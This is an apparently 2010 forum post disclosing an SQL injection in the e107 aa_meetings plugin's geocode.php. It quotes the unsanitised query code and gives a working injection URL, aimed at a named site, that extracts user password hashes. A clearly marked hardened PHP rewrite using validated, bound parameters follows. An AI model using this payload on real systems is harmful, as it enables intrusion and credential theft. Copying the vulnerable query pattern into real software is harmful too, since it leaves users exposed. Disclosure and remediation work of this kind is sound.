
30.04.2010, 06:44
пам
aa_meetings v1.1
[download]
SQL inj
/e107_plugins/aa_meetings/geocode.php
PHP code:
...// Select all the rows in the markers table
$query = "SELECT * FROM ".MPREFIX."aam_meetings WHERE 1";
if ($_GET['MeetingID']) $query .= " and MeetingID=".$_GET['MeetingID'];
else $query .= " and (Lat is null or Lng is null)";
$result = mysql_query($query);
if (!$result) {
die("Invalid query: " . mysql_error());
}...
Result:
http://ovdpohe.sk/e107_plugins/aa_meetings/geocode.php?MeetingID=1+or+%28select+1+from+%28sel ect%20count%280%29%20from%20e107_user%20group%20by %20concat%28user_password%20,0x3a,floor%28rand%280 %29*2%29%29%29x%29--
Last edited by Strilo4ka; 30.04.2010 at 16:20.
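A hardened counterpart of the query construction quoted in the post, added here as an example; it is not part of the original post or of the plugin's code. It validates `MeetingID` as an integer, binds it as a parameter, and logs database errors instead of returning them to the client. Assumptions: PDO replaces the legacy `mysql_*` calls, an in-memory SQLite table with constructed rows stands in for the plugin's MySQL table, and `select_meetings()` is a hypothetical name.

```php
<?php
// Added example: hardened form of the geocode.php query shown in the post.
// Assumptions: PDO instead of mysql_*, in-memory SQLite instead of MySQL,
// select_meetings() is a hypothetical helper name.
define('MPREFIX', 'e107_');

function select_meetings(PDO $db, array $get): array
{
    $sql = 'SELECT * FROM ' . MPREFIX . 'aam_meetings WHERE 1=1';
    $params = [];
    if (isset($get['MeetingID']) && $get['MeetingID'] !== '') {
        // Accept only a positive integer; anything else is rejected outright.
        $id = filter_var($get['MeetingID'], FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 1]]);
        if ($id === false) {
            throw new InvalidArgumentException('MeetingID must be a positive integer');
        }
        $sql .= ' AND MeetingID = :id';   // value is bound, never concatenated
        $params[':id'] = $id;
    } else {
        $sql .= ' AND (Lat IS NULL OR Lng IS NULL)';
    }
    try {
        $stmt = $db->prepare($sql);
        $stmt->execute($params);
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Detail goes to the server log; the client never sees database error text.
        error_log('aa_meetings query failed: ' . $e->getMessage());
        throw new RuntimeException('Query failed');
    }
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE e107_aam_meetings (MeetingID INTEGER, Lat REAL, Lng REAL)');
$db->exec('INSERT INTO e107_aam_meetings VALUES (1, 48.1, 17.1), (2, NULL, NULL)');

// A valid id, an empty value, and a non-integer value.
foreach (['1', '', '1 or 1=1'] as $input) {
    try {
        $rows = select_meetings($db, ['MeetingID' => $input]);
        printf("%-12s -> %d row(s)\n", var_export($input, true), count($rows));
    } catch (InvalidArgumentException $e) {
        printf("%-12s -> rejected: %s\n", var_export($input, true), $e->getMessage());
    }
}
```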